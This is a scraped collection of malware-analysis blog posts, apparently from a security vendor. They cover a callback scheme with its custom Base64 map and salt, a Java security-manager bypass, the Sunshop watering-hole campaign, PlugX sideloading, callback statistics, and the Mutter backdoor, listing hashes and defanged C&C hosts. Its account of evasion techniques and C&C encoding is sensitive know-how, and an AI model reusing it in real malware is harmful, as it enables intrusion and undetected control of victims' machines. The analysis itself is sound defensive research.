  • “This program cannot be run in DOS mode”
  • “KERNEL32.dll”
  • “LoadLibraryA”

3.3. Deployment of Various Cryptographic Functions

3.3.1. Secure Callback

The malware performs the callback in a secure manner. It uses a custom Base64 map to encode its data, and creates a salted digital thumbprint to allow validation of data.

Below describes the steps to validate a callback using an example of the following URL:

hxxp:// 5P &wDq= 6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk== &k4fJdSp7= cc3237bc79192a096440faca0fdae10 &GvQF2lotIr5bT2= 349118df672db38f9e65659874b60b27

The URL could be generalised as follows:

Domain/<PHP>?<rand 11-13 char>= <A'>&<rand 3-5 char>= <B'>&<rand 7-9 char>= <C'>&<rand 14-16 chars>= <D'>

The definition of A’, B’, C’ and D’ are as follows:

Let H be the function which encodes binary into hexadecimal characters prepend with “%”, if it is not alphanumeric, dash, underscore or dot.

Let B64 be the base 64 encoder using the following custom map, "URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY".

Let PT be the plain text which is in the form of "<HostName>[<RunType>]:<IPAddress>{1}", where HostName and IPAddress are string, and RunType is a character.

Let A be the random of 3 to 7 characters, and A' = H(A)

Let B be B64 (PT), and B' = H(B)

Let C be 32 char deliminator, and C' = H(C)

Let D be H( MD5 ( salt  + MD5 ( B64(PT) + A + C )  )   ), salt = "%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23"  , and D' = H(D)

Hence, in this case, the specific malicious URL could be applied as follows:

Domain/<PHP>  =

A’ = “5Pb

B’ = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S%2Bw8npH5oAZk==

C’ = “cc3237bc79192a096440faca0fdae107

D’ = “ 349118df672db38f9e65659874b60b27  (This is the digital signature)

The hash could be verified as follow:

B64(PT) + A + C = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==” +  “5Pb” + “cc3237bc79192a096440faca0fdae107”

MD5 (B64(PT) + A + C) = “766cf9e96c1a508c59f7ade1c50ecd28”

MD5 (salt + MD5(B64(PT) + A + C))   = MD5 ( “%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23” + “766cf9e96c1a508c59f7ade1c50ecd28”)

= 349118df672db38f9e65659874b60b27 (This equals to D’, which means verified)

The encoded plain text (B) could be recovered:

B64(PT) = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==”;

PT = “MY_COMPUTER_NAME[F]:{1}”, where “MY_COMPUTER_NAME” is the hostname, ‘F’ is the run type, “” is the IP address.

Note: This example is mocked up using a dummy computer name and IP address.

The python code below could be used to decode the custom encoded string (see Figure below).


Figure 6 Python to Decode a Custom Base 64

3.3.2. Random Generator Using Mersenne Twister Algorithm

The malware was found to perform a callback at random intervals so as to evade network investigation when looking for network connections that are performed in a regular interval. Additionally, even the name of the parameters in the get string have a random length and name, which makes it hard to create a fix signature to detect such callbacks (see ‎3.3.1 to understand how a callback is created).


Figure 7 Mersenne Twister Algorithm Seeding function

 3.4. In-Memory Only Malicious Code

On the disk, the malicious code is either encrypted or compressed to evade scanning using signature rules. Only upon being loaded into memory, does the malicious code (that appears to be in the form of a DLL) get manually loaded without the use of Windows 32 API. In this way, when an investigation is performed, the malicious DLL is not revealed. Additionally, it makes it much harder for analysis to be performed.


Figure 8 Segments in the memory which contains the malicious code

Taking a deeper look at the decrypted malicious code, this malware was found to contain at least the following functions:

  • Download file
  • Download and execute or load library
  • Change sleep duration
  • Open and close interactive sessions

4. Conclusion

Malware is increasingly becoming more contextually advanced. It attempts to appear as much as possible like legitimate software or documents. In this example, we would conclude the following.

  1. A potentially stolen document was used as a decoy document to increase its credibility. It is also a sign that the compromised organisations could be used as a soft target to compromise their business partners and allies.
  2. It is important to put a stop to the malware infection at the very beginning, which is the exploitation phase. Once a network is compromised, it is increasingly harder to detect such threats.
  3. Anti-incident response/forensic techniques are increasingly used to evade detection. It would require a keen eye on details and a wealth of experience to identify all these advance techniques.

5. Works Cited

Carnegie Mellon University. (n.d.). Retrieved from

Katsuki, T. (19 Nov, 2012). Malware Targeting Windows 8 Uses Google Docs. Retrieved from

I would like to thank several colleagues for their significant contributions on this post: Darien Kindlund, Ned Moran, Nart Villeneuve, and Thoufique Haq.



Get Set Null Java Security

Java, being widely used by the applications, has also been actively targeted by malware authors. One of the most common techniques to exploit Java applications, is to disable the security manager. This blog provides widely used logic used by malware authors to disable the security manager.

Per the Java tutorial:

‘A security manager is an object that defines a security policy for an application. This policy specifies actions that are unsafe or sensitive. Any actions not allowed by the security policy cause a SecurityException to be thrown. An application can also query its security manager to discover which actions are allowed.’

Once an application has a reference to the security manager object, it can request permission to do specific things. For example, System.exit, which terminates the Java virtual machine with an exit status, invokes SecurityManager.checkExit to ensure that the current thread has permission to shut down the application.

One very common technique used by malware authors to exploit Java is to disable the security manager. Once the security manager has been disabled, the next steps may involve loading a malicious executable or connecting to a malicious website.

One of the common calls which generally appear in a malicious jar to disable security manager is SetSecurityManager(null). Besides making a direct call to SetSecurityManager, there can be other approaches for example locating the address of  java/lang/system and using it to disable the security manager. Basically, once the address has been located, memory is traversed until the address of getSecurityManager() is located.  wrmMem() function is then called and null is written directly to the address of getSecurityManager(), thus disabling the security manager.

For more information regarding the pseudo code and exploitation of a vulnerability to disable a security manager, we encourage our readers to refer to recently published article in Virus Bulletin June 2013 issue.


Ready for Summer: The Sunshop Campaign

FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, as well as recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims based on the use of the Internet Explorer zero-day as well as the amount of traffic observed at making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website that leverage a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious javascript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised website was running Internet Explorer 8.0 the malicious javascript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Any other victims were redirected to a page that downloaded two malicious jars.

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)











Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The java exploits were packaged as two different jar files. One jar file had a MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had a MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with a MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with a MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research into with our friends at Mandiant we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain of nameserver1[.]zapto[.]org resolved to the same IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)


Connection: Keep-Alive

Content-Type: text/html

Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had a MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same IP between April 2nd and 8th.


The Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar tactics include the use of zero-day exploits, strategic web compromise as well as Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee’s website in 2010.This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.


CVE Exploit hash Payload hash Malware family C&C Host C&C IP
CVE-2013-1347 CVE-2013-1347 fb24c49299b197e1b56a1a51430aea26 fb24c49299b197e1b56a1a51430aea26 b0ef2ab86f160aa416184c09df8388fe b0ef2ab86f160aa416184c09df8388fe 9002 9002 dns[.]homesvr[.]tk dns[.]homesvr[.]tk
CVE-2013-2423 CVE-2013-2423 f4bee1e845137531f18c226d118e06d7 f4bee1e845137531f18c226d118e06d7 d99ed31af1e0ad6fb5bf0f116063e91f d99ed31af1e0ad6fb5bf0f116063e91f 9002 9002 asp[.]homesvr[.]linkpc[.]net asp[.]homesvr[.]linkpc[.]net
CVE-2013-1493 CVE-2013-1493 3fbb7321d8610c6e2d990bb25ce34bec 3fbb7321d8610c6e2d990bb25ce34bec 42bd5e7e8f74c15873ff0f4a9ce974cd 42bd5e7e8f74c15873ff0f4a9ce974cd 9002 9002 ssl[.]homesvr[.]tk ssl[.]homesvr[.]tk
Unknown Unknown Unknown Unknown 6fe0f6e68cd9cc6ed7e100e7b3626665 6fe0f6e68cd9cc6ed7e100e7b3626665 Briba Briba nameserver1[.]zapto[.]org nameserver1[.]zapto[.]org
CVE-2013-1493 CVE-2013-1493 51aff823274e9d12b1a9a4bbbaf8ce00 51aff823274e9d12b1a9a4bbbaf8ce00 2B6605B89EAD179710565D1C2B614665 2B6605B89EAD179710565D1C2B614665 Poison Ivy Poison Ivy 9ijhh45[.]zapto[.]org 9ijhh45[.]zapto[.]org

Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick

FireEye Labs has discovered a targeted attack towards Chinese political rights activists. The targets appear to be members of social groups that are involved in the political rights movement in China. The email turned up after the attention received in Beijing during the 12th National People's Congress and the 12th National Committee of the Chinese People's Political Consultative Conference, which is the election of a new core of leadership of the Chinese government, to determine the future of China's five-year development plan [1].

The email contains a weaponized attachment that utilizes the Windows Office CVE-2012-0158 exploit to drop the benign payload components and decoy document. The Remote Access Tool (RAT) PlugX itself is known as a combination of benign files that build the malicious execution. The Microsoft file OInfoP11.exe also known as “Office Data Provider for WBEM” is a certified file found in the National Software Reference Library (NIST) and is a component from Microsoft Office 2003 suite. For integrity checking endpoint protection, this file would be deemed as a valid clean file. In Windows 7+ distributions, the svchost.exe will require user interaction by displaying a UAC prompt only if UAC is enabled. Although in Windows XP distributions, this attack does not require user interaction. The major problem is that this file is subject to DLL Sideloading. In previous cases, PlugX has been utilizing similar DLL Sideloading prone files such as a McAfee binary called mcvsmap.exe [2], Intel’s hkcmd.exe [3], and NVIDIA’s NvSmart.exe [4]. In this case, OInfoP11.exe loads a DLL file named OInfo11.ocx (payload loader posing as an ActiveX DLL) that decompresses and decrypts the malicious payload OInfo11.ISO. This technique can be used to evade endpoint security solution that relies on binary signing. Traditional anti-virus (AV) solutions will have a hard time to identify the encrypted and compressed payload. At the time of writing of this blog, there is only 1 out of 46 AV vendors can detect the OInfo11.ocx file.

The diagram in figure 1 shows the behavior and relationship of these files.

5132013image001Figure 1: Attack Diagram


In Figure 2, the targeted email advertises a suffrage movement seminar event. Figure 3 is the contents of the Google document form link that contains the same information as in the email. In figure 4, the decoy document contains the details of the particular seminar section mentioned in the Google document link.


Figure 2: Original Email

Below is the English translation of the email in figure 2.

Li Ping

5132013image005Figure 3: Google Form

Decoy Document

5132013image007Figure 4: Decoy Document

Below is the translation to the document shown above.

The seminar

Attack Analysis

The XLS file (1146fdd6b579ac7144ff575d4d4fa28d) utilizes the CVE-2012-1058 Windows Office exploit to drop the “ews.exe” payload and the decoy document shown in figure 4. This payload extracts the Microsoft file OINFOP11.exe, the benign DLL OInfo11.ocx and encoded and compressed shellcode sections from Oinfo11.ISO. OInfoP11.exe will load OInfo11.ocx as a DLL and once loaded will decompress using RTLDecompressBuffer and decrypt the Oinfo11.ISO to run in memory. The malicious execution is never dropped to the file-system and is therefore not seen by filesystem-based anti-virus detectors. Figure 5 shows the high level view of the relationship of the dropped files.


Figure 5: Payload Relationship

Summary of Dropped Files

Name Md5 Locations Type Encoded/Encrypted Compressed
Ews.exe Ews.exe 721cca40df0f7eab5b5cb069ee8fda9d 721cca40df0f7eab5b5cb069ee8fda9d %TEMP% %TEMP% Exe Exe
OINFOP11.EXE OINFOP11.EXE a31cad2960a660cb558b32ba7236b49e a31cad2960a660cb558b32ba7236b49e %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ Exe (clean) Exe (clean)
OInfo11.ocx OInfo11.ocx b355dedbabb145bbf8dd367adac4f8c5 b355dedbabb145bbf8dd367adac4f8c5 %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ Binary File Binary File Yes Yes
OInfo11.ISO OInfo11.ISO 128e3fc5ffba06abdd3edab2aff3753f 128e3fc5ffba06abdd3edab2aff3753f %TEMP%\RarSFX0\%ALLUSERSPROFILE%\\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\\SXS\ Binary File Binary File Yes Yes Yes Yes

Exploit Details

This malware uses CVE-2012-0158 to drop the payload from the section shown in Figure 6.


Figure 6: Exploit Payload Section

Shellcode can be found in the first few bytes of this section. Figure 7 shows the disassembly of the code found at the 0x1de0b offset shown in figure 6.


Figure 7: Payload Shellcode

Campaign Characteristics

OInfoP11.exe is a valid Microsoft file and its certificate is shown in figure 8.


Figure 8: Signature Usage

When the OInfop11.exe is called with the following arguments as C:\Documents and Settings\All Users\SxS\OINFOP11.EXE" 200 0, it will begin the loading of the file OInfo11.ocx.


Figure 10: Loader Entrypoint

The arrow shows the exact jump point where the entrypoint to where the shellcode begins for the decompression and decryption of the ISO file.


Figure 11: Shellcode Example

This is an example of the memory space of the loaded benign DLL OInfo11.ocx. The functionality of OInfo11.ocx is essentially a loader in which this section decompresses and decrypts the malicious payload in memory.


Figure 12: Decryption of the ISO file

This is the decryption loop used through out the sample. In this instance, it is used to decrypt the ISO shellcode in memory.


Figure 13: DLL location in memory

This is an example of the complete malicious DLL address space in memory.


Artifacts to watch for:

Mutex   \BaseNamedObjects\oleacc-msaa-loaded
Registry Key Registry Key Adds Adds \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
Registry Key Registry Key Sets Value Sets Value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware
Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
Folders and Files Folders and Files Hides Hides %ALLUSERS PROFILE%\SXS\



The DLL injects code into svchost using the VirtualAllocEx call then uses WriteProcessMemory to write into the memory space of svchost.exe. The thread is then resumed to run the injected code. This injection process is used for both svchost.exe and msiexec.exe. When svchost.exe spawns msiexec.exe it calls the CreateEnvironmentBlock and the CreateProcessesUser so that the svchost service can launch a user session.

Keylogging Activity

Creates a kellogging file in %ALLUSERS PROFILE%\SXS\ as NvSmart.hlp. Below is an example of the content of this file.


Proxy Establishment

This sample can communicate using ICMP, UDP, HTTP and TCP. In this situation the sample is using the string Protocol:[ TCP], Host: [], Proxy: [0::0::] to establish the proxy for the C&C communication.


Figure 14: Communication Options

Modes of Operation Overview The table below outlines some of the functionality that this variant uses. The options have not changed so therefore this table is used as a refresher. Figure 15 shows an example of how these functions are called by the sample.

Mode Description
Disk Disk Access disk drives to modify the files Access disk drives to modify the files
Nethood Nethood List shares List shares
Netstat Netstat List TCP/UDP connections List TCP/UDP connections
Option Option Send system commands to the workstation such as screen lock Send system commands to the workstation such as screen lock
PortMap PortMap Port mapping Port mapping
Process Process Modify the state of processes Modify the state of processes
RegEdit RegEdit Modify registry keys Modify registry keys
Service Service Modify services Modify services
Shell Shell Communicate through the established name pipe to the C&C server Communicate through the established name pipe to the C&C server
SQL SQL SQL database queries SQL database queries
Telnet Telnet Startup telnet server on the victim Startup telnet server on the victim


Figure 15: Functionality Example

C&C Details and Communication

In figure 16, the sample is communicating to over port 90. The C&C node is down in this case, but the communication is dynamic non-http communication. An example of the callback content is shown in figure 17. This sample will also try to communicate with other instances laterally in the same network. An example of this traffic and content can be seen in figure 18 and figure 19.


Figure 16: PCAP of C&C communication


Figure 17: Callback Traffic


Figure 18: UDP Beacon


Figure 19: UDP packet content

Whois Information on the IP

inetnum: -

netname: NEWTT-AS-AP

descr: Wharf T&T

Limited descr: 11/F, Telecom Tower,

descr: Wharf T&T Square, 123 Hoi Bun Road

descr: Kwun Tong, Kowloon country: HK

admin-c: EN62-AP

tech-c: BW128-AP

mnt-by: APNIC-HM

mnt-lower: MAINT-HK-NEWTT

mnt-routes: MAINT-HK-NEWTT

mnt-irt: IRT-NEWTT-HK


remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: 20120725

source: APNIC

person: Eric Ng

nic-hdl: EN62-AP

remarks: please report spam or abuse to



address: 11/F Telecom Tower, Wharf T&T Square

address: 123 Hoi Bun Road, Kwun Tong,'

phone: +852-2112-2653 fax-no: +852-2112-7883

country: HK changed: 20070716

mnt-by: MAINT-NEW source: APNIC

person: Benson Wong

nic-hdl: BW128-AP


address: 5/F, Harbour City, Kowloon,

address: Hong Kong

phone: +852-21122651

fax-no: +852-21127883

country: HK

changed: 20070420


source: APNIC

I want to thank the FireEye Labs Team.





Malware Callbacks

Today we released our first-ever analysis of malware callbacks.

FireEye monitored more than 12 million malware communications seeking instructions—or callbacks—across hundreds of thousands of infected enterprise hosts, capturing details of advanced attacks as well as more generic varieties during the course of 2012. Callback activity reveals a great deal about an attacker’s intentions, interests and geographic location. Cyber attacks are a widespread global activity. We’ve built interactive maps that highlight the presence of malware globally:

Our key findings:

  1. Malware has become a multinational activity. Over the past year, callbacks were sent to command and control (CnC) servers in 184 countries—a 42 percent increase when compared to 130 countries in 2010.
  2. Two key regions stand out as hotspots driving advanced cyber attacks: Asia and Eastern Europe. Looking at the average callbacks per company by country, the Asian nations of China, South Korea, India, Japan, and Hong Kong accounted for 24 percent. Not far behind, the Eastern European countries of Russia, Poland, Romania, Ukraine, Kazhakstan, and Latvia comprised 22 percent. (North America represented 44 percent but this is due to CnC servers residing in the United States to help attackers with evasion.)
  3. The majority of Advanced Persistent Threat (APT) callback activities are associated with APT tools that are made in China or that originated from Chinese hacker groups. By mapping the DNA of known APT malware families against callbacks, FireEye Malware Intelligence Lab discovered that the majority of APT callback activities—89 percent—are associated with APT tools that are made in China or that originated from Chinese hacker groups. The main tool is Gh0st RAT.
  4. Attackers are increasingly sending initial callbacks to servers within the same nation in which the target resides. To improve evasion, hackers are increasingly placing CnC servers within target nations. At the same time, this fact gives a strong indicator of which countries are most interesting to attackers.
  5. Technology organizations are experiencing the highest rate of APT callback activity. With a high volume of intellectual property, technology firms are natural targets for attackers and are experiencing heavy APT malware activity.
  6. For APT attacks, CnC servers were hosted in the United States 66 percent of the time, a strong indicator that the U.S. is still the top target country for attacks. As previously mentioned, attackers increasingly put CnC servers in the target country to help avoid detection. With such a high proportion of CnC servers, by a wide margin, the U.S. is subject to the highest rate of malware attacks. This is likely, due to a very high concentration of intellectual property and digitized data that resides in the U.S.
  7. Techniques for disguising callback communications are evolving. To evade detection, CnC servers are leveraging social networking sites like Facebook and Twitter for communicating with infected machines. Also, to mask exfiltrated content, attackers embed information inside common files, such as JPGs, to give network scanning tools the impression of normal traffic.
  8. Attack patterns vary substantially globally:




    1. South Korean firms experience the highest level of callback communications per organization. Due to a robust internet infrastructure, South Korea has emerged as a fertile location for cybercriminals to host their CnC infrastructure. For example, FireEye found that callbacks from technology firms are most likely to go to South Korea.
    2. In Japan, 87 percent of callbacks originated and stayed in country. This may give an indication of the high value of Japanese intellectual property.
    3. In Canada, 99 percent of callbacks exited the country. In the U.K., exit rates were 90 percent. High exit rates indicate attackers are unconcerned about detection. In Canada and the U.K., attackers appear to be unconcerned about detection and pursue low-hanging fruit opportunistically.





The Mutter Backdoor: Operation Beebus with New Targets

FireEye Labs has observed a series of related attacks against a dozen organizations in the aerospace, defense, and telecommunications industries as well as government agencies located in the United States and India which have been occurring at least as early as December of 2011. In at least one case, a decoy document included in the attack contained content that focused on Pakistan military advancements in unmanned vehicle, or “drone” technology.

Technically, these attacks exploited previously discovered vulnerabilities via document files delivered by email in order to plant a previously unknown backdoor onto victim systems. The malware used in these attacks employs a number of interesting techniques to “hide in plain sight” and to evade dynamic malware analysis systems. Similar to, though not based on the attacks we saw in South Korea, the malware tries to stay inactive as long as possible to evade dynamic analysis detection methods.

We have linked these attacks back to Operation Beebus through the C&C infrastructure along with the similar targets and timeline observed. Although some of the targets of these attacks overlapped with Beebus targets, there were many new targets discovered including some in India. As we uncover more targets related to these attacks, we are seeing a common link between them: unmanned vehicles, also known as “drones”. The set of targets cover all aspects of unmanned vehicles, land, air, and sea, from research to design to manufacturing of the vehicles and their various subsystems. Other related malware have been discovered through the same C&C infrastructure that have a similar set of targets, that when included bring the total number of targets to more than 20 as of this writing. These targets include some in academia which have received military funding for their research projects relating to unmanned vehicles.


All of the attacks we have observed occurred through document exploits attacking known vulnerabilities. We have seen RTF and XLS files used for delivery. Searching the internet for the author and document names yields information regarding South Asia politics. Although all of the document exploits we have analyzed drop a decoy document, most of them are either empty or filled with unreadable data with two exceptions.


One is an article about Pakistan’s indigenous UAV industry which is attributed to author Aditi Malhotra, an Indian writer and Associate Fellow at the Centre for Land Warfare Studies (CLAWS) in New Delhi. Although we are not sure this particular work is actually hers, we did find a reference to a similarly named article “Pakistan’s UAV programme: Ambitious, with some friendly help.” Unfortunately, this document was not available. Other works of hers on a similar note include “India’s Silence on Chinese Incursions” and “China and Pakistan: Dangerous Liaisons.”

The other decoy document is contact info for an American with a military provided email address from Joint Base Andrews in Maryland, but with a physical address in Pakistan titled “Family Planning Association of Base (FPAB).” It looks like they took the “Family Planning Association of Bangladesh” and combined it with “Joint Base Andrews.” The title of the email field is “FPAP Email”, “FPAP” could stand for “Family Planning Association of Pakistan.” Ultimately, we could make no sense from this information.

The Mutter Backdoor

Two different versions of the same backdoor were used in all of these attacks. In every case we have found, the main component is a DLL dropped by an executable compiled minutes after the DLL. The dropper shares the same decoding functions as the DLL and performs some modifications on the DLL that will be described later. There was one unique case we found where the initial dropper was a self-extracting archive that utilizes Visual Basic and batch scripts to download and install the DLL instead of extracting it from a resource.

Mutter is HTTP proxy aware, and attempts to determine if a proxy is required and what the proxy details are if necessary. It uses to perform such tests. It uses HTTP to communicate with the C&C server and expects an encoded string between a pair of <p> tags in the response. The URL in the request has one parameter, “i”, which is set to an encoded representation of a string that follows this format:

<Mutter version#>-<campaign marker?>-<victim hostname>-<victim IP address>

We are not certain about the second part of this string, it may be either a campaign marker or an extension of the version number. In all our cases, it is set to either “SN0” or “SN1." Actual strings are shared in the appendix information at the end of this blog.


This HTTP request pictured in the screenshot is from the older version of Mutter. The newer versions of Mutter have a very similar HTTP request, but with the Host and Connection headers swapped.

The response string is decoded and parsed for the following commands:

“m”: executes a shell command

“u”: uploads a file to the victim (downloads a file from the victim’s perspective)

“d”: downloads a file to the attacker (uploads a file from the victim’s perspective)

“R”: removes the auto-run registry value

These commands are referenced in the code in this order, and when said aloud it sounds like “mutter”, hence the name chosen for the malware. In the earlier version of this backdoor, the “d” command was referenced, but the code had not been implemented yet. In both versions, another command string “f” appears along with the others, but is not referenced in the code. This perhaps indicates a future feature to be added.

This malware employs several interesting evasion techniques. For starters, it employs several “hide in plain sight” techniques common to malware used in targeted attacks. It specifies fake properties, pretending to be Google or Microsoft.



This brings us to the next “hide in plain sight” tactic we noticed. Observe the size of the file above. It’s a whopping 41 megabytes. With rare exception, malware typically have a small size usually no larger than a few hundred kilobytes. When an investigator comes across a file megabytes in size, he may be discouraged from taking a closer look. Interestingly, the original size of this particular DLL is around 160 kilobytes, although the PE headers already indicate its future size as shown below. The dropper will decode this DLL from its resource section, drop it onto the victim’s system, and proceed to fill its resource section with randomly generated data. This has another useful side effect of giving each DLL a unique hash, making it more difficult to identify.


In addition to these hiding techniques, this malware also appears to employ techniques to possibly evade dynamic malware analysis systems. This has been an ongoing trend in malware development that we and others have observed several times in past. The malware author will add code to delay the execution of the important functionality for some period of time with the idea being that if the malware stalls for long enough, the dynamic malware analysis system will give up on it and pass it off as benign. This malware has two routines that we could find no other purpose than for such an evasion.

One routine is a function that simply runs a series of loops, incrementing a local variable over and over, thousands of times. It ultimately disregards the final value of this variable, meaning that the function serves no purpose. This function is called many times throughout the rest of the code. It may have been implemented for the purpose of wasting time.

Another routine seems to have a similar goal, but with a different approach. This time, a loop is implemented with a call to sleep for a short time. This loop occurs many times, and each time it will also allocate a chunk of memory on the heap, performing math operations on it and printing it to the console over and over again. Keep in mind that this memory is not initialized to any value and is not used for anything later in the code, it is essentially junk memory. This seems to be another means of wasting time.

We detect this malware as Backdoor.APT.NS01.

C&C Details

Most of the domains registered for C&C use in this campaign were done so through the free dynamic DNS Provider Dynamic DNS is a popular option for domain registration since it is free and provides a convenient level of anonymity.  Looking at passive DNS records for other domains pointing to the IP addresses used to host the C&C services turned up many other related domains. Various subdomains of the domain have pointed to several IPs pointed to by the Mutter domains. This is interesting because this is the name of the folder created by Mutter on victims’ systems. Furthermore, this domain is not a publicly available dynamic DNS provider and the email address used to register this domain is  We cannot be certain, but this name could be in reference to Binalakshmi Nepram, a writer-activist born in Manipur India who is fighting for disarmament. This fits the theme we have observed from other clues left behind in decoy documents. Another domain that is indirectly linked is with this interesting registration information.


Agni is the Hindu god of fire. Notice the combination of India and China references here. The email address used to register this domain was also referenced in a Chinese developer forum, but nothing else interesting was discovered about it.

The IP addresses hosting the C&C services are scattered all over the world and are believed to be compromised hosts.

Attackers, Targets, and Timeline

The attackers appear to be the well known and prolific “Comment Group” as we had stated in our previous blog on Operation Beebus. This link was made through finding several overlapping IP addresses used by Mutter and Beebus such as the following.


The theme of these attacks appears to be South Asia politics. The hints scattered throughout the documents and domain registrant information were laid on pretty thick which is something be wary of. The only legible, sensible decoy document observed so far is revealing of the interests of at least one of the targets of this campaign: namely the military threat of Pakistan against India and its growing relationships with other countries including China. The particular topic of this decoy document also appears to be a common link between most of the targets we have seen: unmanned vehicles.

The timeline below outlines the events specific to Mutter that we had visibility into. This campaign is still ongoing with Mutter callbacks being made to this day.




Exploit Document MD5 Exploit Exploit Document Filename Decoy Document Title Decoy Document Author Decoy Document Last Modified First Seen
b5f4a9aac67b53762ed98fafd067c803 b5f4a9aac67b53762ed98fafd067c803 CVE-2012-0158 CVE-2012-0158 NA NA Pakistan’s Indigenous UAV industry Pakistan’s Indigenous UAV industry GOPAL GURUNG GOPAL GURUNG Aug 2nd 2010 Aug 2nd 2010 Aug 27th 2012 Aug 27th 2012
92643bfa4121f1960c43c78a3d53568b 92643bfa4121f1960c43c78a3d53568b CVE-2008-3005 CVE-2008-3005 2012_3_12.xls 2012_3_12.xls NA NA NA NA Jan 26th 2003 Jan 26th 2003 Mar 22nd 2012 Mar 22nd 2012
4d5a235048e94579aab0062057296186 4d5a235048e94579aab0062057296186 CVE-2010-3333 CVE-2010-3333 Change of Address.doc Change of Address.doc Tele: 2619 4428 Tele: 2619 4428 kdly kdly Dec 6th 2011 Dec 6th 2011 Dec 7th 2011 Dec 7th 2011
589f10e2efdd98bfbdc34f247b6a347f 589f10e2efdd98bfbdc34f247b6a347f CVE-2010-3333 CVE-2010-3333 Urgent message.doc Urgent message.doc NA NA Administrator Administrator Feb 2nd 2003 Feb 2nd 2003 Mar 2nd 2012 Mar 2nd 2012
fd9777c90abb4b758b4aff29cfd68b98 fd9777c90abb4b758b4aff29cfd68b98 CVE-2012-0158 CVE-2012-0158 NA NA Tariq Masud Tariq Masud Haroon-ur-Rashid/Administrator Haroon-ur-Rashid/Administrator Sept 11 2012 Sept 11 2012    


Dropper Filename Dropper MD5 DLL Filename Mutex C&C Host Decoded “i” Value Compile Time
